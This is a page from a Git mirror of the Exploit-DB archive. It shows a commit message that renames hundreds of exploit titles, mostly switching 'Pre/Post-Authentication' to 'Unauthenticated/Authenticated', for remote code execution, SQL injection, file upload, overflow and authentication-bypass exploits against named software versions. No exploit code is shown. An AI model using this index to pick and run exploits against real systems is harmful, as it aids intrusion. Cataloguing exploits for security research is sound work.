bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/unix/remote/764.c
Offensive Security 0be1ea959a DB: 2016-09-09 
11 new exploits

Samba 3.0.4 - SWAT Authorization Buffer Overflow
Samba 3.0.4 SWAT - Authorisation Buffer Overflow

Apache OpenSSL - 'OpenFuckV2.c' Remote Exploit
Apache/mod_ssl (< 2.8.7) OpenSSL - 'OpenFuckV2.c' Remote Exploit (2)

HP-UX FTP Server - Pre-Authentication Directory Listing Exploit (Metasploit)
HP-UX FTP Server - Unauthenticated Directory Listing Exploit (Metasploit)

WinEggDropShell 1.7 - Multiple Pre-Authentication Remote Stack Overflow (PoC)
WinEggDropShell 1.7 - Multiple Unauthenticated Remote Stack Overflow (PoC)

FileCOPA FTP Server 1.01 - (USER) Remote Pre-Authentication Denial of Service
FileCOPA FTP Server 1.01 - (USER) Remote Unauthenticated Denial of Service

Multiple Applications - Local Credentials Disclosure

Asterisk 1.2.15 / 1.4.0 - Pre-Authentication Remote Denial of Service
Asterisk 1.2.15 / 1.4.0 - Unauthenticated Remote Denial of Service

IBM Lotus Domino Server 6.5 - Pre-Authentication Remote Exploit
IBM Lotus Domino Server 6.5 - Unauthenticated Remote Exploit

Frontbase 4.2.7 - Post-Authentication Remote Buffer Overflow (2.2)
Frontbase 4.2.7 - Authenticated Remote Buffer Overflow (2.2)

IBM Tivoli Provisioning Manager - Pre-Authentication Remote Exploit
IBM Tivoli Provisioning Manager - Unauthenticated Remote Exploit

Mercury SMTPD - Remote Pre-Authentication Stack Based Overrun (PoC)
Mercury SMTPD - Remote Unauthenticated Stack Based Overrun (PoC)

Mercury/32 4.51 - SMTPD CRAM-MD5 Pre-Authentication Remote Overflow
Mercury/32 4.51 - SMTPD CRAM-MD5 Unauthenticated Remote Overflow
SIDVault LDAP Server - Pre-Authentication Remote Buffer Overflow
Mercury/32 3.32-4.51 - SMTP Pre-Authentication EIP Overwrite
SIDVault LDAP Server - Unauthenticated Remote Buffer Overflow
Mercury/32 3.32-4.51 - SMTP Unauthenticated EIP Overwrite

Hexamail Server 3.0.0.001 - (pop3) Pre-Authentication Remote Overflow (PoC)
Hexamail Server 3.0.0.001 - (pop3) Unauthenticated Remote Overflow (PoC)

Airsensor M520 - HTTPD Remote Pre-Authentication Denial of Service / Buffer Overflow (PoC)
Airsensor M520 - HTTPD Remote Unauthenticated Denial of Service / Buffer Overflow (PoC)

Mercury/32 4.52 IMAPD - SEARCH command Post-Authentication Overflow
Mercury/32 4.52 IMAPD - SEARCH command Authenticated Overflow
SAP MaxDB 7.6.03.07 - Pre-Authentication Remote Command Execution
McAfee E-Business Server - Remote Pre-Authentication Code Execution / Denial of Service (PoC)
SAP MaxDB 7.6.03.07 - Unauthenticated Remote Command Execution
McAfee E-Business Server - Remote Unauthenticated Code Execution / Denial of Service (PoC)

MailEnable Pro/Ent 3.13 - (Fetch) Post-Authentication Remote Buffer Overflow
MailEnable Pro/Ent 3.13 - (Fetch) Authenticated Remote Buffer Overflow

NetWin Surgemail 3.8k4-4 - IMAP Post-Authentication Remote LIST Universal Exploit
NetWin Surgemail 3.8k4-4 - IMAP Authenticated Remote LIST Universal Exploit

HP OpenView NNM 7.5.1 - OVAS.exe SEH Pre-Authentication Overflow
HP OpenView NNM 7.5.1 - OVAS.exe SEH Unauthenticated Overflow

BigAnt Server 2.2 - Pre-Authentication Remote SEH Overflow
BigAnt Server 2.2 - Unauthenticated Remote SEH Overflow

Joomla Component JPad 1.0 - Post-Authentication SQL Injection
Joomla Component JPad 1.0 - Authenticated SQL Injection

CMS Made Simple 1.2.4 - (FileManager module) File Upload
CMS Made Simple 1.2.4 - (FileManager module) Arbitrary File Upload

freeSSHd 1.2.1 - Remote Stack Overflow PoC (Post-Authentication)
freeSSHd 1.2.1 - Remote Stack Overflow PoC (Authenticated)

freeSSHd 1.2.1 - (Post-Authentication) Remote SEH Overflow
freeSSHd 1.2.1 - (Authenticated) Remote SEH Overflow

vsftpd 2.0.5 - (CWD) Post-Authentication Remote Memory Consumption Exploit
vsftpd 2.0.5 - (CWD) Authenticated Remote Memory Consumption Exploit

Surgemail 39e-1 - Post-Authentication IMAP Remote Buffer Overflow Denial of Service
Surgemail 39e-1 - Authenticated IMAP Remote Buffer Overflow Denial of Service

Debian OpenSSH - (Post-Authentication) Remote SELinux Privilege Elevation Exploit
Debian OpenSSH - (Authenticated) Remote SELinux Privilege Elevation Exploit

Oracle Internet Directory 10.1.4 - Remote Pre-Authentication Denial of Service
Oracle Internet Directory 10.1.4 - Remote Unauthenticated Denial of Service

AvailScript Jobs Portal Script - (Post-Authentication) (jid) SQL Injection
AvailScript Jobs Portal Script - (Authenticated) (jid) SQL Injection

AvailScript Jobs Portal Script - (Post-Authentication) File Upload
AvailScript Jobs Portal Script - (Authenticated) Arbitrary File Upload
Serv-U 7.3 - (Post-Authentication) (stou con:1) Denial of Service
Serv-U 7.3 - (Post-Authentication) Remote FTP File Replacement
Serv-U 7.3 - (Authenticated) (stou con:1) Denial of Service
Serv-U 7.3 - (Authenticated) Remote FTP File Replacement

Microsoft PicturePusher - ActiveX Cross-Site File Upload Attack (PoC)
Microsoft PicturePusher - ActiveX Cross-Site Arbitrary File Upload Attack (PoC)

Noticeware E-mail Server 5.1.2.2 - (POP3) Pre-Authentication Denial of Service
Noticeware E-mail Server 5.1.2.2 - (POP3) Unauthenticated Denial of Service

freeSSHd 1.2.1 - (Post-Authentication) SFTP rename Remote Buffer Overflow PoC
freeSSHd 1.2.1 - (Authenticated) SFTP rename Remote Buffer Overflow PoC

LoudBlog 0.8.0a - (Post-Authentication) (ajax.php) SQL Injection
LoudBlog 0.8.0a - (Authenticated) (ajax.php) SQL Injection

freeSSHd 1.2.1 - (Post-Authentication) SFTP realpath Remote Buffer Overflow PoC
freeSSHd 1.2.1 - (Authenticated) SFTP realpath Remote Buffer Overflow PoC

AJ Auction Authentication - Bypass Exploit
AJ Auction - Authentication Bypass

Simple Directory Listing 2 - Cross-Site File Upload
Simple Directory Listing 2 - Cross-Site Arbitrary File Upload

Mini File Host 1.x - Arbitrary PHP File Upload
Mini File Host 1.x - Arbitrary .PHP File Upload

Memberkit 1.0 - Remote PHP File Upload
Memberkit 1.0 - Remote Arbitrary .PHP File Upload

WinFTP 2.3.0 - 'LIST' Post-Authentication Remote Buffer Overflow
WinFTP 2.3.0 - 'LIST' Authenticated Remote Buffer Overflow

Coppermine Photo Gallery 1.4.19 - Remote PHP File Upload
Coppermine Photo Gallery 1.4.19 - Remote Arbitrary .PHP File Upload

Free Download Manager 2.5/3.0 - (Authorization) Stack Buffer Overflow (PoC)
Free Download Manager 2.5/3.0 - Authorisation Stack Buffer Overflow (PoC)

WikkiTikkiTavi 1.11 - Remote PHP File Upload
WikkiTikkiTavi 1.11 - Remote Arbitrary.PHP File Upload

Baran CMS 1.0 - Arbitrary ASP File Upload / File Disclosure / SQL Injection / Cross-Site Scripting / Cookie Manipulation
Baran CMS 1.0 - Arbitrary .ASP File Upload / File Disclosure / SQL Injection / Cross-Site Scripting / Cookie Manipulation

zFeeder 1.6 - 'admin.php' Pre-Authentication
zFeeder 1.6 - 'admin.php' Unauthenticated

Addonics NAS Adapter - Post-Authentication Denial of Service
Addonics NAS Adapter - Authenticated Denial of Service

Serv-U 7.4.0.1 - (SMNT) Post-Authentication Denial of Service
Serv-U 7.4.0.1 - (SMNT) Authenticated Denial of Service

Hannon Hill Cascade Server - (Post-Authentication) Command Execution
Hannon Hill Cascade Server - (Authenticated) Command Execution

Telnet-Ftp Service Server 1.x - (Post-Authentication) Multiple Vulnerabilities
Telnet-Ftp Service Server 1.x - (Authenticated) Multiple Vulnerabilities

Femitter FTP Server 1.x - (Post-Authentication) Multiple Vulnerabilities
Femitter FTP Server 1.x - (Authenticated) Multiple Vulnerabilities

Gravity Board X 2.0b - SQL Injection / Post-Authentication Code Execution
Gravity Board X 2.0b - SQL Injection / Authenticated Code Execution

XRDP 0.4.1 - Pre-Authentication Remote Buffer Overflow (PoC)
XRDP 0.4.1 - Unauthenticated Remote Buffer Overflow (PoC)

Addonics NAS Adapter - 'bts.cgi' Post-Authentication Remote Denial of Service
Addonics NAS Adapter - 'bts.cgi' Authenticated Remote Denial of Service

Cpanel - (Post-Authentication) (lastvisit.html domain) Arbitrary File Disclosure
Cpanel - (Authenticated) (lastvisit.html domain) Arbitrary File Disclosure

MySQL 5.0.45 - (Post-Authentication) COM_CREATE_DB Format String PoC
MySQL 5.0.45 - (Authenticated) COM_CREATE_DB Format String PoC

Adobe JRun 4 - (logfile) Post-Authentication Directory Traversal
Adobe JRun 4 - (logfile) Authenticated Directory Traversal

FtpXQ FTP Server 3.0 - (Post-Authentication) Remote Denial of Service
FtpXQ FTP Server 3.0 - (Authenticated) Remote Denial of Service

NetAccess IP3 - (Post-Authentication) (ping option) Command Injection
NetAccess IP3 - (Authenticated) (ping option) Command Injection

Joomla 1.5.12 - tinybrowser Arbitrary File Upload / Execute
Joomla 1.5.12 tinybrowser - Arbitrary File Upload /Execution

Cerberus FTP server 3.0.6 - Pre-Authentication Denial of Service
Cerberus FTP server 3.0.6 - Unauthenticated Denial of Service

HP NNM 7.53 - ovalarm.exe CGI Pre-Authentication Remote Buffer Overflow
HP NNM 7.53 - ovalarm.exe CGI Unauthenticated Remote Buffer Overflow

Novell eDirectory 8.8 SP5 - (Post-Authentication) Remote Buffer Overflow
Novell eDirectory 8.8 SP5 - (Authenticated) Remote Buffer Overflow

httpdx 1.5.2 - Remote Pre-Authentication Denial of Service (PoC)
httpdx 1.5.2 - Remote Unauthenticated Denial of Service (PoC)

(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Pre-Authentication Crash (PoC)
(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Unauthenticated Crash (PoC)

(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Pre-Authentication Remote Exploit
(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Unauthenticated Remote Exploit
Easy~Ftp Server 1.7.0.2 - Post-Authentication Buffer Overflow
Easy~Ftp Server 1.7.0.2 - Post-Authentication Buffer Overflow (SEH) (PoC)
Easy~Ftp Server 1.7.0.2 - Post-Authentication Buffer Overflow (PoC)
Easy~Ftp Server 1.7.0.2 - Authenticated Buffer Overflow
Easy~Ftp Server 1.7.0.2 - Authenticated Buffer Overflow (SEH) (PoC)
Easy~Ftp Server 1.7.0.2 - Authenticated Buffer Overflow (PoC)

httpdx 1.5.3b - Multiple Remote Pre-Authentication Denial of Service (PoC)
httpdx 1.5.3b - Multiple Remote Unauthenticated Denial of Service (PoC)

Kerio MailServer 6.2.2 - Pre-Authentication Remote Denial of Service (PoC)
Kerio MailServer 6.2.2 - Unauthenticated Remote Denial of Service (PoC)

(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Pre-Authentication Buffer Overflow (Metasploit)
(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Unauthenticated Buffer Overflow (Metasploit)
eDisplay Personal FTP server 1.0.0 - Pre-Authentication Denial of Service (PoC)
eDisplay Personal FTP server 1.0.0 - Multiple Post-Authentication Crash SEH (PoC)
eDisplay Personal FTP server 1.0.0 - Unauthenticated Denial of Service (PoC)
eDisplay Personal FTP server 1.0.0 - Multiple Authenticated Crash SEH (PoC)

eDisplay Personal FTP server 1.0.0 - Multiple Post-Authentication Stack Buffer Overflow (1)
eDisplay Personal FTP server 1.0.0 - Multiple Authenticated Stack Buffer Overflow (1)

eDisplay Personal FTP server 1.0.0 - Multiple Post-Authentication Stack Buffer Overflow (2)
eDisplay Personal FTP server 1.0.0 - Multiple Authenticated Stack Buffer Overflow (2)

uTorrent WebUI 0.370 - Authorization header Denial of Service
uTorrent WebUI 0.370 - Authorisation Header Denial of Service

Easy Ftp Server 1.7.0.2 - MKD Remote Post-Authentication Buffer Overflow
Easy Ftp Server 1.7.0.2 - MKD Remote Authenticated Buffer Overflow

ProSSHD 1.2 - Remote Post-Authentication Exploit (ASLR + DEP Bypass)
ProSSHD 1.2 - Remote Authenticated Exploit (ASLR + DEP Bypass)

Apache Axis2 Administration console - (Post-Authentication) Cross-Site Scripting
Apache Axis2 Administration console - (Authenticated) Cross-Site Scripting

(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Universal Pre-Authentication Denial of Service
(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Universal Unauthenticated Denial of Service

BlazeDVD 5.1 - '.plf' Stack Buffer Overflow (PoC) (Windows 7 ALSR + DEP Bypass)
BlazeDVD 5.1 - '.plf' Stack Buffer Overflow (PoC) (Windows 7 ASLR + DEP Bypass)

dotDefender 3.8-5 - Pre-Authentication Remote Code Execution (via Cross-Site Scripting)
dotDefender 3.8-5 - Unauthenticated Remote Code Execution (via Cross-Site Scripting)
Easy FTP Server 1.7.0.11 - (Post-Authentication) 'MKD' Command Remote Buffer Overflow
Easy FTP Server 1.7.0.11 - (Post-Authentication) 'LIST' Command Remote Buffer Overflow
Easy FTP Server 1.7.0.11 - (Authenticated) 'MKD' Command Remote Buffer Overflow
Easy FTP Server 1.7.0.11 - (Authenticated) 'LIST' Command Remote Buffer Overflow

Easy FTP Server 1.7.0.11 - (Post-Authentication) 'CWD' Command Remote Buffer Overflow
Easy FTP Server 1.7.0.11 - (Authenticated) 'CWD' Command Remote Buffer Overflow

Easy FTP Server 1.7.0.11 - (Post-Authentication) 'LIST' Command Remote Buffer Overflow (Metasploit)
Easy FTP Server 1.7.0.11 - (Authenticated) 'LIST' Command Remote Buffer Overflow (Metasploit)

UPlusFTP Server 1.7.1.01 - (Post-Authentication) HTTP Remote Buffer Overflow
UPlusFTP Server 1.7.1.01 - (Authenticated) HTTP Remote Buffer Overflow

Easy FTP Server 1.7.0.11 - (Post-Authentication) Multiple Commands Remote Buffer Overflow
Easy FTP Server 1.7.0.11 - (Authenticated) Multiple Commands Remote Buffer Overflow

Achievo 1.4.3 - Multiple Authorization Flaws
Achievo 1.4.3 - Multiple Authorisation Flaws

PHPMotion 1.62 - 'FCKeditor' File Upload
PHPMotion 1.62 - 'FCKeditor' Arbitrary File Upload

Home FTP Server 1.11.1.149 - Post-Authentication Directory Traversal
Home FTP Server 1.11.1.149 - Authenticated Directory Traversal

News Script PHP Pro - 'FCKeditor' File Upload
News Script PHP Pro - 'FCKeditor' Arbitrary File Upload

Microsoft Windows 2003 - AD Pre-Authentication BROWSER ELECTION Remote Heap Overflow
Microsoft Windows 2003 - AD Unauthenticated BROWSER ELECTION Remote Heap Overflow

ActFax Server FTP 4.25 Build 0221 (2010-02-11) - (Post-Authentication) Remote Buffer Overflow
ActFax Server FTP 4.25 Build 0221 (2010-02-11) - (Authenticated) Remote Buffer Overflow

Vtiger CRM 5.0.4 - Pre-Authentication Local File Inclusion
Vtiger CRM 5.0.4 - Unauthenticated Local File Inclusion

HP OpenView NNM 7.53/7.51 - OVAS.exe Pre-Authentication Stack Buffer Overflow
HP OpenView NNM 7.53/7.51 - OVAS.exe Unauthenticated Stack Buffer Overflow

MailEnable - Authorization Header Buffer Overflow
MailEnable - Authorisation Header Buffer Overflow
ColdFusion 8.0.1 - Arbitrary File Upload and Execution
Adobe RoboHelp Server 8 - Arbitrary File Upload and Execution
ColdFusion 8.0.1 - Arbitrary File Upload / Execution
Adobe RoboHelp Server 8 - Arbitrary File Upload / Execution

OpenX - banner-edit.php File Upload PHP Code Execution
OpenX - banner-edit.php Arbitrary File Upload / PHP Code Execution

Joomla 1.5.12 - tinybrowser File Upload Code Execution
Joomla 1.5.12 tinybrowser - Arbitrary File Upload / Code Execution

N_CMS 1.1E - Pre-Authentication Local File Inclusion / Remote Code Exploit
N_CMS 1.1E - Unauthenticated Local File Inclusion / Remote Code Exploit

If-CMS 2.07 - Pre-Authentication Local File Inclusion (1)
If-CMS 2.07 - Unauthenticated Local File Inclusion (1)

IPComp - encapsulation Pre-Authentication kernel memory Corruption
IPComp - encapsulation Unauthenticated kernel memory Corruption

SQL-Ledger 2.8.33 - Post-Authentication Local File Inclusion / Edit
SQL-Ledger 2.8.33 - Authenticated Local File Inclusion / Edit

Adobe Flash Player < 10.1.53.64 - Action Script Type Confusion Exploit (DEP + ASLR Bypass)
Adobe Flash Player < 10.1.53.64 - Action Script Type Confusion Exploit (ASLR + DEP Bypass)

Easy Ftp Server 1.7.0.2 - Post-Authentication Buffer Overflow
Easy Ftp Server 1.7.0.2 - Authenticated Buffer Overflow

ActFax Server FTP - (Post-Authentication) Remote Buffer Overflow
ActFax Server FTP - (Authenticated) Remote Buffer Overflow

If-CMS 2.07 - Pre-Authentication Local File Inclusion (Metasploit) (2)
If-CMS 2.07 - Unauthenticated Local File Inclusion (Metasploit) (2)

DVD X Player 5.5.0 Pro / Standard - Universal Exploit (DEP + ASLR Bypass)
DVD X Player 5.5.0 Pro / Standard - Universal Exploit (ASLR + DEP Bypass)

DVD X Player 5.5 Pro - (SEH DEP + ASLR Bypass) Exploit
DVD X Player 5.5 Pro - (SEH + ASLR + DEP Bypass) Exploit

TomatoCart 1.1 - Post-Authentication Local File Inclusion
TomatoCart 1.1 - Authenticated Local File Inclusion

BlazeVideo HDTV Player 6.6 Professional - Universal DEP + ASLR Bypass
BlazeVideo HDTV Player 6.6 Professional - Universal ASLR + DEP Bypass

QuiXplorer 2.3 - Bugtraq File Upload
QuiXplorer 2.3 - Bugtraq Arbitrary File Upload

QQPLAYER Player 3.2 - PICT PnSize Buffer Overflow Windows DEP_ASLR Bypass (Metasploit)
QQPLAYER Player 3.2 - PICT PnSize Buffer Overflow Windows (ASLR + DEP Bypass) (Metasploit)

Avaya WinPDM UniteHostRouter 3.8.2 - Remote Pre-Authentication Command Execution
Avaya WinPDM UniteHostRouter 3.8.2 - Remote Unauthenticated Command Execution
Sysax Multi Server 5.53 - SFTP Post-Authentication SEH Exploit
Sysax 5.53 - SSH 'Username' Buffer Overflow Pre-Authentication Remote Code Execution (Egghunter)
Sysax Multi Server 5.53 - SFTP Authenticated SEH Exploit
Sysax 5.53 - SSH 'Username' Buffer Overflow Unauthenticated Remote Code Execution (Egghunter)

BlazeVideo HDTV Player 6.6 Professional - SEH & DEP & ASLR
BlazeVideo HDTV Player 6.6 Professional - SEH + ASLR + DEP Bypass

Dolibarr ERP & CRM 3 - Post-Authentication OS Command Injection
Dolibarr ERP & CRM 3 - Authenticated OS Command Injection

V-CMS - PHP File Upload and Execution
V-CMS - Arbitrary .PHP File Upload / Execution

WebCalendar 1.2.4 - Pre-Authentication Remote Code Injection
WebCalendar 1.2.4 - Unauthenticated Remote Code Injection

appRain CMF - Arbitrary PHP File Upload
appRain CMF - Arbitrary .PHP File Upload

EGallery - PHP File Upload
EGallery - Arbitrary .PHP File Upload

SpiceWorks 5.3.75941 - Persistent Cross-Site Scripting / Post-Authentication SQL Injection
SpiceWorks 5.3.75941 - Persistent Cross-Site Scripting / Authenticated SQL Injection

WordPress Front End Upload 0.5.4.4 Plugin - Arbitrary PHP File Upload
WordPress Front End Upload 0.5.4.4 Plugin - Arbitrary .PHP File Upload

WebPageTest - Arbitrary PHP File Upload
WebPageTest - Arbitrary .PHP File Upload

XODA 0.4.5 - Arbitrary PHP File Upload
XODA 0.4.5 - Arbitrary .PHP File Upload

Elcom CMS 7.4.10 - Community Manager Insecure File Upload
Elcom CMS 7.4.10 - Community Manager Insecure Arbitrary File Upload

Trend Micro Control Manager 5.5/6.0 AdHocQuery - Post-Authentication Blind SQL Injection
Trend Micro Control Manager 5.5/6.0 AdHocQuery - Authenticated Blind SQL Injection

Mod_SSL 2.8.x - Off-by-One HTAccess Buffer Overflow
Apache/mod_ssl 2.8.x - Off-by-One HTAccess Buffer Overflow
Dropbox Desktop Client 9.4.49 (64bit) - Local Credentials Disclosure
OpenSSL SSLv2 - Malformed Client Key Remote Buffer Overflow (1)
OpenSSL SSLv2 - Malformed Client Key Remote Buffer Overflow (2)
Apache/mod_ssl (< 2.8.7) OpenSSL - 'OpenFuck.c' Remote Exploit (1)
Apache/mod_ssl OpenSSL < 0.9.6d / < 0.9.7-beta2 - 'openssl-too-open.c' SSL2 KEY_ARG Overflow Exploit

qdPM 7.0 - Arbitrary PHP File Upload
qdPM 7.0 - Arbitrary .PHP File Upload

Oracle Database - Authentication Protocol Security Bypass
Oracle Database - Protocol  Authentication Bypass

Mod_NTLM 0.x - Authorization Heap Overflow
Mod_NTLM 0.x - Authorisation Heap Overflow

Mod_NTLM 0.x - Authorization Format String
Mod_NTLM 0.x - Authorisation Format String

Geeklog 1.3.x - Authentication SQL Injection
Geeklog 1.3.x - Authenticated SQL Injection

NFR Agent FSFUI Record - Arbitrary File Upload Remote Code Execution
NFR Agent FSFUI Record - Arbitrary File Upload / Remote Code Execution

PHP Arena paFileDB 1.1.3/2.1.1/3.0/3.1 - Arbitrary File Upload and Execution
PHP Arena paFileDB 1.1.3/2.1.1/3.0/3.1 - Arbitrary File Upload / Execution

MySQL - Remote Pre-Authentication User Enumeration
MySQL - Remote Unauthenticated User Enumeration

vbPortal 2.0 alpha 8.1 - Authentication SQL Injection
vbPortal 2.0 alpha 8.1 - Authenticated SQL Injection
DameWare Mini Remote Control Server 3.7x - Pre-Authentication Buffer Overflow (1)
DameWare Mini Remote Control Server 3.7x - Pre-Authentication Buffer Overflow (2)
DameWare Mini Remote Control Server 3.7x - Pre-Authentication Buffer Overflow (3)
DameWare Mini Remote Control Server 3.7x - Unauthenticated Buffer Overflow (1)
DameWare Mini Remote Control Server 3.7x - Unauthenticated Buffer Overflow (2)
DameWare Mini Remote Control Server 3.7x - Unauthenticated Buffer Overflow (3)
WordPress WP-Property Plugin - PHP File Upload
WordPress Asset-Manager Plugin - PHP File Upload
WordPress WP-Property Plugin - Arbitrary .PHP File Upload
WordPress Asset-Manager Plugin - Arbitrary .PHP File Upload

Ubiquiti AirOS 5.5.2 - Remote Post-Authentication Root Command Execution
Ubiquiti AirOS 5.5.2 - Remote Authenticated Root Command Execution

RobotFTP Server 1.0/2.0 - Remote Pre-Authentication Command Denial of Service
RobotFTP Server 1.0/2.0 - Remote Unauthenticated Command Denial of Service
SureCom EP-9510AX/EP-4504AX Network Device - Malformed Web Authorization Request Denial of Service (1)
SureCom EP-9510AX/EP-4504AX Network Device - Malformed Web Authorization Request Denial of Service (2)
SureCom EP-9510AX/EP-4504AX Network Device - Malformed Web Authorisation Request Denial of Service (1)
SureCom EP-9510AX/EP-4504AX Network Device - Malformed Web Authorisation Request Denial of Service (2)

Softwin BitDefender - AvxScanOnlineCtrl COM Object Arbitrary File Upload and Execution
Softwin BitDefender - AvxScanOnlineCtrl COM Object Arbitrary File Upload / Execution

Firebird 1.0 - Remote Pre-Authentication Database Name Buffer Overrun
Firebird 1.0 - Remote Unauthenticated Database Name Buffer Overrun

Novell NCP - Pre-Authentication Remote Root Exploit
Novell NCP - Unauthenticated Remote Root Exploit

Polar Helpdesk 3.0 - Cookie Based Authentication System Bypass
Polar Helpdesk 3.0 - Cookie Based Authentication Bypass

IRIS Citations Management Tool - (Post-Authentication) Remote Command Execution
IRIS Citations Management Tool - (Authenticated) Remote Command Execution

Polycom HDX - Telnet Authorization Bypass (Metasploit)
Polycom HDX - Telnet Authentication Bypass (Metasploit)

OpenEMR - PHP File Upload
OpenEMR - Arbitrary .PHP File Upload

PolarPearCMS - PHP File Upload
PolarPearCMS - Arbitrary .PHP File Upload

Apache 2.0.x - mod_ssl Remote Denial of Service
Apache/mod_ssl 2.0.x - Remote Denial of Service

phpWebSite 0.x - Image File Processing Arbitrary PHP File Upload
phpWebSite 0.x - Image File Processing Arbitrary .PHP File Upload

BetaParticle blog 2.0/3.0 - upload.asp Unauthenticated File Upload
BetaParticle blog 2.0/3.0 - upload.asp Unauthenticated Arbitrary File Upload

BlueSoleil 1.4 - Object Push Service BlueTooth File Upload Directory Traversal
BlueSoleil 1.4 - Object Push Service BlueTooth Arbitrary File Upload / Directory Traversal

MoinMoin - twikidraw Action Traversal File Upload
MoinMoin - twikidraw Action Traversal Arbitrary File Upload

Mikrotik RouterOS sshd (ROSSSH) - Remote Pre-Authentication Heap Corruption
Mikrotik RouterOS sshd (ROSSSH) - Remote Unauthenticated Heap Corruption

Alt-N MDaemon 2-8 - Remote Pre-Authentication IMAP Buffer Overflow
Alt-N MDaemon 2-8 - Remote Unauthenticated IMAP Buffer Overflow

FlexWATCH 3.0 - AIndex.asp Authorization Bypass
FlexWATCH 3.0 - AIndex.asp Authentication Bypass
HP ProCurve Manager - SNAC UpdateDomainControllerServlet File Upload
HP ProCurve Manager SNAC - UpdateCertificatesServlet File Upload
HP ProCurve Manager - SNAC UpdateDomainControllerServlet Arbitrary File Upload
HP ProCurve Manager SNAC - UpdateCertificatesServlet Arbitrary File Upload

WordPress Curvo Themes - Cross-Site Request Forgery File Upload
WordPress Curvo Themes - Cross-Site Request Forgery / Arbitrary File Upload

WordPress Highlight Premium Theme - Cross-Site Request Forgery / File Upload
WordPress Highlight Premium Theme - Cross-Site Request Forgery / Arbitrary File Upload

PHPBB2 - Admin_Ug_Auth.php Administrative Security Bypass
PHPBB2 - Admin_Ug_Auth.php Administrative Bypass

Adobe Acrobat Reader - ASLR + DEP Bypass with SANDBOX Bypass
Adobe Acrobat Reader - ASLR + DEP Bypass with Sandbox Bypass

Castripper 2.50.70 - '.pls' DEP Exploit
Castripper 2.50.70 - '.pls' DEP Bypass Exploit

Google Urchin 5.7.3 - Report.cgi Authorization Bypass
Google Urchin 5.7.3 - Report.cgi Authentication Bypass

Adobe Flash - Method Calls Use-After-Free

Adobe Flash - Transform.colorTranform Getter Info Leak

RSA Authentication Agent for Web 5.3 - URI redirection
RSA Authentication Agent for Web 5.3 - URI Redirection

Android - libutils UTF16 to UTF8 Conversion Heap Buffer Overflow

Zabbix 2.0 - 3.0.3 - SQL Injection

ClassSystem 2.0/2.3 - class/ApplyDB.php Unrestricted Arbitrary File Upload Arbitrary Code Execution
ClassSystem 2.0/2.3 - class/ApplyDB.php Unrestricted Arbitrary File Upload / Arbitrary Code Execution

Apple iCloud Desktop Client 5.2.1.0 - Local Credentials Disclosure

LogMeIn Client 1.3.2462 (64bit) - Local Credentials Disclosure

SpagoBI 4.0 - Arbitrary Cross-Site Scripting / File Upload
SpagoBI 4.0 - Arbitrary Cross-Site Scripting / Arbitrary File Upload

Katello (Red Hat Satellite) - users/update_roles Missing Authorization
Katello (Red Hat Satellite) - users/update_roles Missing Authorisation

Freepbx 13.0.x < 13.0.154 - Remote Command Execution
FreePBX 13.0.x < 13.0.154 - Unauthenticated Remote Command Execution

Jobberbase 2.0 - Multiple Vulnerabilities

Windows x86 - Bind Shell TCP Shellcode

WordPress MailPoet Newsletters 2.6.8 Plugin - (wysija-newsletters) Unauthenticated File Upload
WordPress MailPoet Newsletters 2.6.8 Plugin - (wysija-newsletters) Unauthenticated Arbitrary File Upload
Bits Video Script 2.04/2.05 - 'addvideo.php' File Upload / Arbitrary PHP Code Execution
Bits Video Script 2.04/2.05 - 'register.php' File Upload / Arbitrary PHP Code Execution
Bits Video Script 2.04/2.05 - 'addvideo.php' Arbitrary File Upload / Arbitrary PHP Code Execution
Bits Video Script 2.04/2.05 - 'register.php' Arbitrary File Upload / Arbitrary PHP Code Execution

Moab < 7.2.9 - Authorization Bypass
Moab < 7.2.9 - Authentication Bypass

Tapatalk for vBulletin 4.x - Pre-Authentication Blind SQL Injection
Tapatalk for vBulletin 4.x - Unauthenticated Blind SQL Injection

Drupal Core < 7.32 - Pre-Authentication SQL Injection
Drupal Core < 7.32 - Unauthenticated SQL Injection

Tincd - Post-Authentication Remote TCP Stack Buffer Overflow
Tincd - Authenticated Remote TCP Stack Buffer Overflow

PMB 4.1.3 - Post-Authentication SQL Injection
PMB 4.1.3 - Authenticated SQL Injection

Liferay Portal 7.0.0 M1/7.0.0 M2/7.0.0 M3 - Pre-Authentication Remote Code Execution
Liferay Portal 7.0.0 M1/7.0.0 M2/7.0.0 M3 - Unauthenticated Remote Code Execution

ManageEngine Multiple Products - Authenticated File Upload
ManageEngine Multiple Products - Authenticated Arbitrary File Upload
Chyrp 2.x - swfupload Extension upload_handler.php File Upload Arbitrary PHP Code Execution
X360 VideoPlayer ActiveX Control 2.6 - (Full ASLR + DEP Bypass)
Chyrp 2.x - swfupload Extension upload_handler.php Arbitrary File Upload / Arbitrary PHP Code Execution
X360 VideoPlayer ActiveX Control 2.6 - (ASLR + DEP Bypass)

Seagate Business NAS 2014.00319 - Pre-Authentication Remote Code Execution
Seagate Business NAS 2014.00319 - Unauthenticated Remote Code Execution

Symantec Web Gateway 5 - restore.php Post-Authentication Command Injection
Symantec Web Gateway 5 - restore.php Authenticated Command Injection

JBoss Seam 2 - Arbitrary File Upload and Execution
JBoss Seam 2 - Arbitrary File Upload / Execution

Barracuda Firmware 5.0.0.012 - Post-Authentication Remote Root Exploit (Metasploit)
Barracuda Firmware 5.0.0.012 - Authenticated Remote Root Exploit (Metasploit)

Basic Analysis and Security Engine (BASE) 1.4.5 - base_ag_main.php Crafted File Upload / Arbitrary Code Execution
Basic Analysis and Security Engine (BASE) 1.4.5 - base_ag_main.php Crafted Arbitrary File Upload / Arbitrary Code Execution

WordPress RevSlider 3.0.95 Plugin - Arbitrary File Upload and Execution
WordPress RevSlider 3.0.95 Plugin - Arbitrary File Upload / Execution

JibberBook 2.3 - 'Login_form.php' Authentication Security Bypass
JibberBook 2.3 - 'Login_form.php' Authentication Bypass

Acuity CMS 2.6.2 - (ASP ) '/admin/file_manager/file_upload_submit.asp' Multiple Parameter File Upload / Code Execution
Acuity CMS 2.6.2 - (ASP ) '/admin/file_manager/file_upload_submit.asp' Multiple Parameter Arbitrary File Upload / Code Execution

